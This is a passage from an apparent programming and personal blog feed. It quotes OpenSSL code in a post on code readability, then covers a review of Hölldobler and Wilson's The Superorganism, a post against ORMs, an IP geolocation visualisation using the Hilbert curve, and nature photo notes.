#6F42C1;"> sk_X509_NAME_new_null</span><span>();</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (ret </span><span style="color: #D73A49;">==</span><span style="color: #005CC5;"> NULL</span><span>)</span></span> <span class="giallo-l"><span> {</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> SSLerr</span><span>(SSL_F_SSL_LOAD_CLIENT_CA_FILE,ERR_R_MALLOC_FAILURE);</span></span> <span class="giallo-l"><span style="color: #D73A49;"> goto</span><span> err;</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> ((xn</span><span style="color: #D73A49;">=</span><span style="color: #6F42C1;">X509_get_subject_name</span><span>(x))</span><span style="color: #D73A49;"> ==</span><span style="color: #005CC5;"> NULL</span><span>)</span><span style="color: #D73A49;"> goto</span><span> err;</span></span> <span class="giallo-l"><span style="color: #6A737D;"> /* check for duplicates */</span></span> <span class="giallo-l"><span> xn</span><span style="color: #D73A49;">=</span><span style="color: #6F42C1;">X509_NAME_dup</span><span>(xn);</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (xn </span><span style="color: #D73A49;">==</span><span style="color: #005CC5;"> NULL</span><span>)</span><span style="color: #D73A49;"> goto</span><span> err;</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (</span><span style="color: #6F42C1;">sk_X509_NAME_find</span><span>(sk,xn)</span><span style="color: #D73A49;"> &gt;=</span><span style="color: #005CC5;"> 0</span><span>)</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> X509_NAME_free</span><span>(xn);</span></span> <span class="giallo-l"><span style="color: #D73A49;"> else</span></span> <span class="giallo-l"><span> {</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> sk_X509_NAME_push</span><span>(sk,xn);</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> sk_X509_NAME_push</span><span>(ret,xn);</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (</span><span style="color: #005CC5;">0</span><span>)</span></span> <span class="giallo-l"><span> {</span></span> <span class="giallo-l"><span>err:</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (ret </span><span style="color: #D73A49;">!=</span><span style="color: #005CC5;"> NULL</span><span>)</span><span style="color: #6F42C1;"> sk_X509_NAME_pop_free</span><span>(ret,X509_NAME_free);</span></span> <span class="giallo-l"><span> ret</span><span style="color: #D73A49;">=</span><span style="color: #005CC5;">NULL</span><span>;</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (sk </span><span style="color: #D73A49;">!=</span><span style="color: #005CC5;"> NULL</span><span>)</span><span style="color: #6F42C1;"> sk_X509_NAME_free</span><span>(sk);</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (in </span><span style="color: #D73A49;">!=</span><span style="color: #005CC5;"> NULL</span><span>)</span><span style="color: #6F42C1;"> BIO_free</span><span>(in);</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (x </span><span style="color: #D73A49;">!=</span><span style="color: #005CC5;"> NULL</span><span>)</span><span style="color: #6F42C1;"> X509_free</span><span>(x);</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (ret </span><span style="color: #D73A49;">!=</span><span style="color: #005CC5;"> NULL</span><span>)</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> ERR_clear_error</span><span>();</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span>(ret);</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #D73A49;">#endif</span></span></code></pre> <p>His objections boil down to the following:</p> <ul> <li>The indentation style is weird, and in many circumstances hard to parse.</li> <li>The project uses a mixture of CamelCase and underscore-based function naming.</li> <li>The error cleanup strategy is bizarre - using a goto to jump into code guarded by an "if(0)" is distinctly unlovely.</li> <li>In this example, the function name mis-characterises what the function actually does. The somewhat shame-faced comment doesn't fix the problem, it just makes it funny.</li> <li>The project suffers from ifdef-itis.</li> <li>Most importantly, the code does not "read" well. In this case, we find multiple levels of indirection, and no clear flow to the function.</li> </ul> <p>So, while Marco's problem <em>started</em> with the project's shoddy documentation and API, his actual code criticism focuses on issues that are apparently superficial. He hasn't discovered a substantive bug or architectural weakness in the snippet above. Instead, what matters to him are simple virtues like consistency, style, and readability. Marco is saying, in fact, that the OpenSSL code sucks because it lacks superficial beauty. I couldn't agree with this position more.</p> <p>I'm reminded of a recent blog post describing "the perfect interview question" for programmers: ask them what bothered them most when reviewing other people's code. The blogger argued that a response focusing on superficial code quality meant that the interviewee was obviously not an "architectural thinker", and was therefore a poor candidate. This is utter tripe. Good programmers know that a lack of superficial code quality and consistency is the <em>best</em> indicator of deeper systemic problems in a project. If you ever need a quick estimate of the quality of a codebase, this is what you should look at first. If you ever have to work on a project with poor code quality, fix the superficial issues first. Ugly code will obscure deeper architectural issues, increase defect rates, make code review hell, and make the project hard to refactor. This is advice so basic that it usually does not need to be given - good coders understand the importance of superficial beauty at such a deep instinctive level that they will feel <em>compelled</em> to fix cleanliness and neatness issues before working on deeper problems.</p> <p>Superficial beauty is not something that is discussed nearly enough in the Open Source world, so I'm going to don my flame-retardant poncho, and name some names. In keeping with this post's starting point, I'm going to focus on projects in C. Lets start with the ugly. The codebase for <a rel="external" href="http://www.vim.org/">Vim</a>, a tool that I spend hours using every day, turns out to be a frightening and inscrutable thicket of #ifdefs. The Linux kernel is immensely variable in quality - some of it is very good, some of it - especially less widely used drivers - is unspeakable. The <a rel="external" href="http://www.mutt.org/">mutt</a> codebase is pretty terrible, prominently featuring one of my pet bugaboos - mixing tabs and spaces, invisibly screwing up indentation depending on your editor configuration. The <a rel="external" href="http://www.wireshark.org/">Wireshark</a> packet sniffer - another project I use daily - is so bad that OpenBSD <a rel="external" href="http://www.openbsd.org/cgi-bin/cvsweb/ports/net/ethereal/Attic/Makefile?hideattic=0">opted to remove</a> it from their ports tree rather than encourage their users to use it. Wireshark wins a special prize for over-commenting. They've clearly abandoned all hope of communicating their intentions through the code itself, degenerating instead to things like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="c"><span class="giallo-l"><span style="color: #6A737D;">/* Now bump the count. */</span></span> <span class="giallo-l"><span>(</span><span style="color: #D73A49;">*</span><span>argc)</span><span style="color: #D73A49;">++</span><span>;</span></span></code></pre> <p>I'll end the post on a high note, with some examples of great code quality. OpenBSD is undoubtedly one of the pin-up projects of the Open Source world, featuring code that is almost supernaturally clean, consistent and direct. If you're interested in taking a look, I recommend starting with some of their recent daemon development - their <a rel="external" href="http://www.openbsd.org/cgi-bin/cvsweb/src/usr.sbin/smtpd/?sortby=date#dirlist">SMTP</a> and <a rel="external" href="http://www.openbsd.org/cgi-bin/cvsweb/src/usr.sbin/ntpd/?sortby=date">NTP</a> daemons are good candidates. Another excellent project to look at is the C Python interpreter, which shares many of OpenBSD's virtues. Note that I mean the interpreter itself - the the standard library is unexpectedly variable in quality. A more obscure project with great code quality is the <a rel="external" href="http://plan9.bell-labs.com/sources/plan9/sys/src/">Plan9 operating system</a>. Sadly, Plan9 never took off (perhaps because it wasn't free software from the beginning), but the codebase illustrates many of the sound principles outlined in by Kernighan and Pike - both of whom were involved in Plan9 - in <a href="https://www.amazon.com/Practice-Programming-Addison-Wesley-Professional-Computing/dp/020161586X">The Practice of Programming</a>.</p> <p><strong>edit:</strong> Meanwhile, over on <a rel="external" href="http://www.reddit.com/r/programming/comments/a0s6o/in_praise_of_superficial_beauty_a_followup_to/">reddit</a> dagbrown has pointed out <a rel="external" href="http://opensource.apple.com/source/procmail/procmail-1.2/procmail/src/procmail.c">procmail</a>, which turns out to be an absolutely unparalleled phenomenon. Go on, have a look - I dare ya.</p> Non-programming books for Programmers: The Superorganism, Hölldobler & Wilson 2009-10-25T00:00:00+00:00 2009-10-25T00:00:00+00:00 https://corte.si/posts/books/superorganism/ <div class="media"> <a href="https:&#x2F;&#x2F;www.amazon.com&#x2F;Superorganism-Beauty-Elegance-Strangeness-Societies&#x2F;dp&#x2F;0393067041&#x2F;ref=sr_1_1?dchild=1&amp;keywords=superorganism&amp;qid=1592693625&amp;s=books&amp;sr=1-1"> <img src="superorganism-cover.jpg" /> </a> <div class="subtitle"> Superorganism </div> </div> <p>It's impossible to talk about <em>The Superorganism</em> without first mentioning <a rel="external" href="http://en.wikipedia.org/wiki/Bert_Holldobler">Bert Hölldobler</a> and <a rel="external" href="http://en.wikipedia.org/wiki/E._O._Wilson">E. O. Wilson</a>'s most famous collaboration - a book called simply <em>The Ants</em>. I've been fascinated with ants since childhood, and <em>The Ants</em> is one of my favourite books - deep enough to be intellectually satisfying on almost any detail, and broad enough to be one of those rare books that summarizes nearly everything to be said about its subject. It's hard to avoid platitudes like "authoritative" and "magisterial" when talking about a book like this, so I will resort to a simple computer science analogy: <em>The Ants</em> is to the study of ants what <em>The Art of Computer Programming</em> is to the study of algorithms. Only more so, because unlike Knuth, Hölldobler and Wilson actually completed their survey in 1990. It should be no surprise then, that I had <em>The Superorganism</em> on pre-order as soon as I heard that Hölldobler and Wilson were publishing their first new book in almost two decades. <em>The Superorganism</em> expands on a theme that also lies at the heart of <em>The Ants</em> - the workings of insect societies. <em>The Superorganism</em> paints with a broader brush than its predecessor, touching frequently on the other great families of eusocial insects - termites, bees and wasps.</p> <div class="media"> <a href="atta_cephalotes.jpg"> <img src="atta_cephalotes.jpg" /> </a> <div class="subtitle"> Atta cephalotes, Costa Rica </div> </div> <p>If you haven't delved into the world of social insects before, you're in for a treat. The range and complexity of social insect behaviour can be weirder and more wonderful than anything found in science fiction. Consider, for example, the lives of what the authors call the "ultimate superorganism": the <a rel="external" href="http://en.wikipedia.org/wiki/Attini">Attine</a> leafcutter ants. The remarkable fact about the leafcutters is that they are farmers, cultivating vast fungal gardens that provide them with essential nutrients. These fungal gardens are grown on a substrate of leaf-matter, and leafcutters get their name from the fact that colonies cut up enormous quantities of leaves to transport back to their nests - one mature colony was estimated to harvest a leaf area of 4550 square meters per year. The fungus gardens are the lifeblood of the leafcutter colony, and they are tended with endless patience and skill. Leaves brought back to the nest are snipped up, molded into pellets, and carefully planted with fungal hyphae taken from elsewhere in the garden. Workers patrol the fungal gardens ceaselessly, weeding out foreign fungal strains and other contaminants. The ants secrete antibiotics that inhibit the growth of other fungi, and produce growth hormones that enhances the growth of their own strain. They wage an endless battle against <em>Escovopsis</em>, a parasitic species of fungus that specialises in invading Attine leafcutter gardens. Remarkably, an important part of their arsenal is a second symbiont: a bacterium that only occurs on the cuticle of leafcutter ants, which produces powerful antibiotics specific to the fungal pest. The ants grow these bacterial weapons on special patches of cuticle, modified specifically to house them. There is also a degree of communication between the ants and their garden fungus. Leafcutter ants are sensitive to the chemicals signals released by distressed fungus, and learn to avoid food that harms their gardens. When a new queen leaves the nest to mate and establish a colony of her own, she carries a sample of the fungus from her parent colony in a cavity next to her oesophagus. Once she has found a likely nesting spot, she spits out the fungal sample, and tends the growing cultivar as closely as she does her own offspring, feeding it with secreted fluid, while she herself subsists off her own bodyfat. Once the first brood of workers have been raised, the queen assumes her proper position as the egg-laying machine at the center of the colony, feeding on unfertilized eggs laid by her workers. If her colony is successful, she will produce about 20 eggs a minute, 24 hours a day, resulting in between 150 and 200 million offspring during her life. The colony can consist of several million ants at any one time. This population is housed in a colossal nest - one typical example had 1920 chambers with 238 fungus gardens. To build it, the ants had to shift 40 tonnes of soil. The nest itself is designed to provide optimal ventilation and humidity for the fungal gardens, and is continually adjusted by the ants to achieve the right conditions. Stretching out from the nest is a set of foraging tunnels that surface into a web of trunk routes along which leaf material is brought back to the nest. Trunk routes are meticulously maintained, with "road workers" clearing debris and encroaching vegetation. Within the ant population there are a range of physical castes, each adapted to a specific set of jobs. The smallest workers maintain and patrol the fungal gardens. The largest are gigantic supersoldiers that specialise in deterring vertebrate predators. Underpinning all of this is a sophisticated chemical communication system, involving a huge array of pheromones, and an incredibly sensitive sensory system. Hölldobler and Wilson cite research that shows that one milligram of the trail pheromone of <em>Atta texana</em> is enough to lead a worker 60 times around the Earth.</p> <p>Ponder for a moment the immense behavioural complexity required to sustain a sophisticated insect civilization like this. There are an extraordinary number of behaviours that need to be optimized, many of which read like they are straight from the pages of a programming competition. Foraging strategies need to be devised to efficiently discover food sources. Once a food source is discovered, its value needs to be estimated, and the right fraction of the colony's labour pool needs to be allocated to exploit it. Throughput needs to be optimised by selecting the right leaf fragment size, while minimizing the significant energetic cost of cutting leaves up smaller than necessary. The cost of constructing and maintaining the web of trunk routes needs to be weighed against the efficiency benefits gained (it turns out that they can improve foraging speed tenfold). There are many, many other interesting sub-problems like these, and the colony solves them all admirably. The entire system reminds one of a super-complicated real-time strategy game, and we can be forgiven for suspecting that there must be some hyper-intelligent controller micromanaging a <a rel="external" href="http://starcraft.wikia.com/wiki/Zerg">Zerg-like</a> expansion of the nest. Here, however, we come to perhaps the most remarkable fact about social insects: their colonies are leaderless. There is no central strategist at all - their entire range of sophisticated behaviour is emergent, arising from the aggregate actions of many small simple units with only local information. And yet, millions of ants can act with such apparent coherence and purpose that biologists like Hölldobler and Wilson have started thinking of colonies as organisms in themselves - "superorganisms" that compete, mate, and strive for survival.</p> <p>Humanity has not yet learned how to cross the chasm that separates the individual ant from the superorganism. We've seen the early glimmers of technologically produced distributed systems - one thinks of things like the Internet, peer-to-peer networks, and maybe some nebulous social constructs like "the blogosphere". The fact is, however, that we are simply incapable of designing distributed systems that even begin to approach the robustness and intricacy of insect colonies. $!superorg!$ is certainly not a manual for applying insectiod principles of distributed engineering to technological problems. It is, however, the best available overview of the best distributed systems we know of, and for that reason alone should be on every intellectually curious computer scientist's bookshelf.</p> <h2 id="bees-resource-allocation-peer-to-peer-communication-and-tiered-architectures">Bees: resource allocation, peer-to-peer communication and tiered architectures</h2> <div class="media"> <a href="waggle-dance.jpg"> <img src="waggle-dance.jpg" /> </a> <div class="subtitle"> The essential form of the honeybee waggle dance, p. 170 of The Superorganism. Reproduced here with the kind permission of its creator, <a href='http://www.margynelson.com/RumfordGraphics-Front-Page.html'>Margaret Nelson</a> </div> </div> <p>That's all very exciting, but it's not very concrete. So, for the second part of this review, I'll look at one example of distributed problem solving covered in $!superorg!$, and explore its fascinating parallels with computer science.</p> <p>The best-studied insect society is surely that of <em>Apis mellifera</em>, the honeybee. In 1947 <a rel="external" href="http://en.wikipedia.org/wiki/Karl_von_Frisch">Karl von Frisch</a> famously decoded part of the "dance language" of the honeybee, showing that the bee <a rel="external" href="http://en.wikipedia.org/wiki/Waggle_dance">waggle dance</a> was used to convey precise information about the distance, direction and quality of a food source to nearby bees. The amazing discovery that bees conveyed complex abstract notions of this type to each other gave us an early insight into the wonder of social insect communication. Over the years since von Frisch's discovery, it has gradually emerged that the waggle dance is just one of a complex set of signals used to implement a distributed resource allocation strategy inside the bee colony. The bees in a hive are loosely specialised into "foragers", who go out of the hive to gather food, and "nectar processors", who remain in the hive to receive nectar from incoming foragers for processing and storage. When a forager returns to the nest laden with pollen and nectar, it searches until it finds a free processor to accept its cargo. The first optimisation problem the hive faces is to balance these two populations of specialists, minimising the waiting time for foragers dropping off their cargos as well as idle time for processors waiting to accept them. The second optimisation problem arises from the fact that the supply of nectar sources is not constant - if a new grove of flowers in bloom is discovered, the hive has to divert resources to exploit it as quickly as possible, adjusting the number of foragers and processors to match. This is complicated by the fact that not all nectar sources are equal: some might be particularly rich, and therefore require more foragers to exploit. A particular bee hive might be extracting nectar from a number of flower patches at the same time, and foragers need to be allocated optimally, and continually re-balanced. Remarkably, the bee colony accomplishes these goals without any central co-ordination, using an entirely distributed algorithm. To see how they do this, we need to flesh out the bee dance language somewhat. Hölldobler and Wilson describe three basic bee dances:</p> <ul> <li><strong>Waggle dance</strong>: The famous dance discovered by von Frisch, which directs forager bees to a specific resource with precise information on the location and distance.</li> <li><strong>Shaking dance</strong>: Recruits more bees to foraging, sending them to the dance floor to look for waggle dancers.</li> <li><strong>Tremble dance</strong>: Induces waggle dancers to stop dancing, and recruits bees to nectar processing.</li> </ul> <p>These dances are signals that provide the communications framework for the "bee algorithm", sketched out by Hölldobler and Wilson in the following set of decision rules:</p> <blockquote> <p>1 | Not enough nectar collectors in the field? If yes, and you also have immediate knowledge of a producing flower patch, perform the waggle dance.</p> <p>2 | Is the flower patch rich or the weather fine or the day early or does the colony need substantially more food? Perform the dance with appropriately greater vivacity and persistence.</p> <p>3 | Not enough active foragers to send into the field? Perform the shaking maneuver.</p> <p>4 | Not enough nectar processors in the hive to handle the nectar inflow? Perform the tremble dance.</p> </blockquote> <p>So, how do bees decide if there are too many foragers or too many nectar processors, using purely local information? The answer is simple and elegant: if a returning forager experiences a wait time of 20 seconds or less before finding a nectar processor, they assume that there is a surplus of processors and recruit more bees to foraging through the waggling dance. If they experience a wait time of 50 seconds or more, they assume that there are too many foragers, and use the tremble dance to both reduce the number foragers and increase the number of processors. Notice that all the signals used in this system are "peer to peer" - bees only communicate with nearby bees that are in the hive at the moment of communication.</p> <p>The system described above is clear enough to implement easily, and there is a rich range of parallels with computer science. It's not surprising, therefore, that a a bit of searching through the literature shows that a number of computer scientists have started mining the bee resource allocation algorithm for ideas. One nice example comes from Sunil Nakrani and <a rel="external" href="http://www2.isye.gatech.edu/~ctovey/">Craig Tovey</a>, who have successfully applied a subset of the behaviour outlined above in a paper called <a rel="external" href="http://www2.isye.gatech.edu/~ctovey/publications/papers/bee.oct19.2004.masi2.pdf">On Honey Bees and Dynamic Allocation in an Internet Server Colony</a>. Consider a hypothetical data center of servers used to implement a hosted application environment. Each application is backed by a dynamic pool of virtual servers, and servers can be added to or removed from the pools transparently. There is, however, a switching cost to moving resources about - re-allocating a virtual server involves server downtime and therefore lost revenue. Application load varies unpredictably - one day an application might be getting three hits a day, and the next it might crop up on Reddit and have a massive load spike. The hosting company is paid based on usage - say, per HTTP request served - and faces the complex problem of optimally allocating its server resources to minimize downtime and maximize revenue. Nakrani and Tovey approach this problem by mapping the bee resource allocation system onto the server allocation problem. In this mapping, foraging bees are the servers, and flower patches are the applications. In nature, the bee recruitment signal - the waggle dance described above - is triggered if a flower patch is sufficiently "profitable". The more profitable the nectar source, the greater the "vivacity and persistence" of the recruitment signal. Nakrani and Tovey simulated a system where servers used a central advertboard to post recruitment adverts. In broad terms, Nakrani and Tovey's servers were more likely to read a random advert from the advertboard, and switch to a different application, when their current application was less profitable. On the other hand, a server was more likely to post an advert to recruit more servers to its application, if its application was more profitable. The result is a distributed algorithm that performs within about 11.5% of an omniscient resource allocator with complete knowledge of all future HTTP requests.</p> <p>Interestingly, Nakrani and Tovey also had something to teach entomologists. They found that while the bee recruitment algorithm performed superbly when there was a lot of variability in application load, it was outperformed by much simpler algorithms when load was relatively static. Their simulation therefore seems to indicate that the bee recruitment algorithm is an adaptation to variability in nectar sources. While this blog post focuses on what computer scientists can learn from insects, the possibility that information might flow the other way is a fascinating one. When I first read about the loose specialisation in the beehive, with foragers handing over their load to processors, my immediate thought was that this described a tiered architecture. Now, there are a number of sound non-architectural reasons why a colony would want to have some bees specialise in foraging. Foragers tend to be the older bees in the colony, and this makes complete sense. Foraging is a hazardous activity, and bees have a limited lifespan. Sending out bees that are approaching the end of their lives anyway is good economics. Hölldobler and Wilson write that this specialisation</p> <blockquote> <p>... causes a problem for the honeybee colony: How can the rate of food collection, particularly of nectar, and the rate of food processing be kept in balance?</p> </blockquote> <p>The computer scientist in me suspects that there may be a different way to look at this aspect of bee behaviour. In computing we produce tiered architectures with independent layers because they <em>improve</em> efficiency and flexibility in various ways. I can't help but wonder if a similar benefit might support this aspect of bee behaviour.</p> <h2 id="postscript">Postscript</h2> <p>One last note before I'm done. Karl von Frisch once said that</p> <blockquote> <p>... the life of bees is like a magic well. The more you draw from it, the more there is to draw.</p> </blockquote> <p>There are some 20,000 species of bee in the world, ranging from solitary species to the great super-societies of domestic honeybees. There are 14,000 species of ants, 4,000 species of termite, and more than 100,000 species of wasp. Each of these species is a unique product of evolution's boundless ingenuity, and each has its own suite of solutions to the problems of survival. When one of these species disappears - and they are doing so at a terrifying rate - the tragedy is not simply that something beautiful is irretrievably gone from the world, but also that we have lost another irreplaceable magic well to study, learn from, and emulate. E. O. Wilson has devoted much of the latter years of his life to the great cause of preserving our biological legacy - if you are interested in this urgent issue (and you should be) I recommend his 2002 book <a rel="external" href="https://www.amazon.com/Future-Life-Edward-Wilson/dp/0679768114">The Future of Life</a> .</p> A Farewell to ORMs 2009-10-12T00:00:00+00:00 2009-10-12T00:00:00+00:00 https://corte.si/posts/code/farewell-to-orms/ <p>j I've been using ORMs for years, starting with my own hand-hacked library back in the days before there were good ORMs for Python, and more recently settling into a comfortable reliance on <a rel="external" href="http://www.sqlalchemy.org/">SQLAlchemy</a>. Over time, though, my initially rosy feelings towards ORMs have begun to sour. I gradually realised I was spending a disproportionate amount of time trying to coax the ORM into doing my bidding - and when I succeeded, the results were often ugly, slow and needlessly opaque. Analysing the performance of some of the more complicated portions of my data access layer was often painful, and I spent cumulative hours poring over generated SQL, trying to figure out what the ORM was doing and why. Usually, improving performance involved side-stepping the ORM altogether. Recently, a particularly gnarly performance issue prompted me to ditch the ORM from a project altogether, with surprisingly pleasant results.</p> <h2 id="impedance-mismatch">Impedance mismatch</h2> <p>Ask any programmer why they use an ORM, and the answer is likely to be "impedance mismatch". This is a lovely phrase from a rhetorical point of view - hovering at the edge of meaning, but nicely avoiding asserting anything that can actually be quantified. The usual hand-wave is that impedance mismatch arises from the tension between table-oriented relational data, and object oriented conceptual thinking. Your Bicycle class - a subclass, naturally, of Vehicle - might have to be reconstructed from data scattered across six different tables, and it's a distressing possibility that none of those tables might be called Bicycle, or indeed Vehicle. What we should aim for, the argument goes, is a programmer's Shangri-La where where we can transparently persist and restore our objects and have the storage taken care of by some magical plumbing. Whether or not the magical plumbing is worthwhile depends largely on how often the abstraction breaks down. The ORM approach does so frequently. Yes, I can use an ORM and think at the object level in the common case, but whenever I need to do anything remotely complicated - optimising a query, say - I'm back in the land of tables and foreign keys. In the end, the structure of data is something fundamental that can't be simplified or abstracted away. The ORM doesn't resolve the impedance mismatch, it just postpones it.</p> <h2 id="a-lighter-abstraction">A lighter abstraction</h2> <p>So, if ORMs are at best a very partial solution to the ill-defined impedance mismatch problem, why do so many programmers swear by them? It's not that they're all fools, it's just that ORMs solve ANOTHER practical problem much more successfully. Most programmers who use ORMs do so simply to avoid re-writing endless nearly identical CRUD operations for every persistable object in their project. This isn't about any fundamental object-relational impedance mismatch - it's simply a problem of query generation. So, this brings me to my own difficult-to-quantify contribution to the miasma of fuzzy thinking that already surrounds this issue: <strong>90% of the benefit most people derive from ORMs can be gained more simply and more transparently through unashamedly table-oriented query generation</strong>. All we need is a nice programmatic way to generate and manipulate SQL statements... Luckily we have just such a tool in the SQLAlchemy <a rel="external" href="http://www.sqlalchemy.org/docs/05/sqlexpression.html">SQLAlchemy SQL expression language</a> - a good, simple and nearly complete language for working with SQL expressions from Python.</p> <p>Pursuing this line of thought, I've ditched the ORM from a few of my projects. Instead, I'm using a defter abstraction - a simple, lightweight framework that uses SQLAlchemy's SQL expression language to auto-generate most queries. This framework is unashamedly table-oriented, and exists to manipulate data at a relational level. It clocks in at less than 150 lines of code. The database schema is no longer defined by the ORM - instead, helper objects are built through schema reflection. The result has been satisfying - my data layers are better encapsulated, database interaction is more transparent, and the conceptual complexity is much reduced. Since nothing happens magically behind the scenes, it's easier to analyse performance, and since there is no session layer (few projects really need one) a whole chunk of complexity has gone away. Using reflection rather than defining the schema in code has made schema evolution much less of a chore. I also retain other benefits usually attributed to ORMs - the expression language abstracts away flavour differences between databases, so I can still, for example, run a large fraction of my unit tests against in-memory SQLite databases and deploy on PostgreSQL. I'm now gradually migrating all my projects to this way of working.</p> Leopard Seal at Sandfly Bay 2009-09-09T00:00:00+00:00 2009-09-09T00:00:00+00:00 https://corte.si/posts/photos/leopardseal/ <div class="media"> <a href="leopardseal.jpg"> <img src="leopardseal-small.jpg" /> </a> <div class="subtitle"> Leopard Seal at Sandfly Bay </div> </div> <p>Took this shot on my morning walk, 15 minutes away from my home. We are usually the only humans on this 1km beach, and we are often out-numbered 10-1 by sea lions. The photo is of a <a rel="external" href="http://en.wikipedia.org/wiki/Leopard_Seal">leopard seal</a> - a rarity in these parts. These sleek top-predators bear as much resemblance to the portly and <a rel="external" href="http://www.flickr.com/photos/8268815@N08/3886175958/">rather ridiculous</a> sea lions as a labradoodle does to a wolf. This one was a juvenile - only about 2.5 meters long - but still managed to exude a considerable amount of toothy menace.</p> Visualising IP Geolocation 2009-09-05T00:00:00+00:00 2009-09-05T00:00:00+00:00 https://corte.si/posts/code/hilbert/explorer/ <style> .jpexample img { background: url(/geohilbert/ALL.png); } </style> <div class="media jpexample"> <a href="&#x2F;geohilbert&#x2F;JP.png"> <img src="&#x2F;geohilbert&#x2F;JP.png" /> </a> <div class="subtitle"> IP Addresses in Japan </div> </div> <p>I'm spending a fair bit of my time working on a project that uses an IP geolocation database to map internet addresses to countries as part of a security survey. There are a number of these location databases available, but comparing their quality and coverage is not trivial, so selecting one to use is hard. I recently decided to spend a few hours looking at the problem, and got hopelessly side-tracked into visualising the databases using the Hilbert curve. The result is the <a href="/geohilbert/index.html">Hilbert Explorer</a>, a mapping of the geographical location of IP addresses onto the Hilbert Curve. You should have a play with it before reading the rest of this post.</p> <h2 id="the-hilbert-curve-a-very-brief-introduction">The Hilbert Curve - a (very) brief introduction</h2> <p>The <a href="http://en.wikipedia.org/wiki/Hilbert_curve">Hilbert Curve</a> is a space-filling <a href="http://mathworld.wolfram.com/Curve.html">curve</a> that is usually produced iteratively, with the N-th step in the iteration referred to as the "order N" curve. Here are orders 1 to 5:</p> <table class="spacertable"> <tr> <td><img src="h1.png"/><br>N=1</td> <td><img src="h2.png"/><br>N=2</td> <td><img src="h3.png"/><br>N=3</td> <td><img src="h4.png"/><br>N=4</td> <td><img src="h5.png"/><br>N=5</td> </tr> </table> <p>To translate from one order to the next, we simply replace U-shapes like the the N=1 diagram with Y-shapes like the N=2 diagram. So, in the N=1 diagram there is a single U to be replaced, in the N=2 diagram there are 4 U-shapes (two at the top, oriented left and right, and two at the bottom oriented down). Each subsequent order has 4 times the number of U shapes the previous one had, so for N=3 we have 16 replacements to do, and so on and so forth.</p> <p>Mathematicians are interested in the behaviour of the limit curve as N approaches infinity - luckily the properties of the curve that are interesting to computer scientists manifest well short of that. For the purposes of this post, we can view the order-N curve simply as a way to lay out a sequence of 2**2N items on a plane, with the rather interesting property that items that are near each other in the sequence are also near each other on the plane:</p> <div class="media"> <a href="coordinates.png"> <img src="coordinates.png" /> </a> </div> <p>The recursive construction above is a nice way to explain the curve, but doesn't lead to an efficient way to actually draw it. For this I turned to Henry S. Warren's wonderful <a rel="external" href="http://www.amazon.com/exec/obidos/ASIN/0201914654/qid%3D1033395248/sr%3D11-1/ref%3Dsr_11_1/104-7035682-9311161">Hacker's Delight</a>, one of those books that I return to again and again. If you don't already own a copy, just buy it - you won't be disappointed. All the images in this post and in the Explorer were drawn with PyCairo using the algorithm for calculating co-ordinates from the distance along the curve given in section 14.4 of this book.</p> <h2 id="visualising-ip-geolocation">Visualising IP Geolocation</h2> <p>Mapping IP addresses to countries is a tricky affair. Control of any given address filters down from IANA to the regional registries, from regional registries to national and local registries, and from there to a myriad of private and government organisations. Here, horse-trading and private enterprise takes over and IP blocks are sold, traded and routed arbitrarily, with the consequence that any given IP might actually be located in geographical area totally unrelated to the controlling organization or even the registry region. A number of companies now offer geolocation databases at various prices, some of them for free. The databases themselves typically contain more than 100,000 subnets, usually spanning something like two billion actual addresses. I had about half a dozen of these databases to compare, and, being a visual creature, I wanted to <strong>see</strong> what I was dealing with. I've been fascinated with the Hilbert curve for a long time, but I first came across the idea of using it to visualise the entire IPv4 address space in Randall Munroe's excellent <a href="http://xkcd.com/195/">hand-drawn map of the Internet</a>. After this was published in 2006 a slew of more detailed visualisations appeared, including at least <a href="http://www.isi.edu/ant/address/whole_internet/index.html">one on a 1:1 scale</a>.</p> <p>We can map X points of data onto a discrete Hilbert curve of order lb(X)/2, so the order 16 Hilbert curve would suffice to display all 2**32 IP addresses at a one-to-one scale. To produce a more manageable image size, I used an order 9 Hilbert curve producing a 512x512 pixel image, where each pixel represents a bucket of 16384 addresses. I then rendered a series of transparent PNG layers - one showing all addresses in the database, and a set of overlays showing the addresses in each country and some "landmarks" like the <a href="http://tools.ietf.org/html/rfc1918">RFC1918</a> addresses. The result looks something like the image at the head of this post. To make the visualisation more interactive, I bolted things together with a bit of Javascript to let me easily switch between countries, and to show IP addresses when hovering over the image. You can find the resulting visualisation for one of the freely-available geolocation databases - <a href="http://www.wipmania.com/en/base/">WorldIP</a> - here:</p> <h2 id="hilbert-explorer"><a href="/geohilbert/index.html">Hilbert Explorer</a></h2> <p>I'll stop there for now, and leave the actual database comparison and a deeper exploration of the related issues for future posts.</p> Seashells from Murdering Beach 2009-08-28T00:00:00+00:00 2009-08-28T00:00:00+00:00 https://corte.si/posts/photos/murderingshells/ <style> .shells td { border-bottom: 0; } </style> <table class="shells"> <tr> <td><a href="http://www.flickr.com/photos/8268815@N08/3863253255/" title="051shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2598/3863253255_b6a88458a6_t.jpg" width="100" height="100" alt="051shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863255667/" title="052shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2477/3863255667_9de928b4d2_t.jpg" width="100" height="100" alt="052shells" /></a></td> <td><a 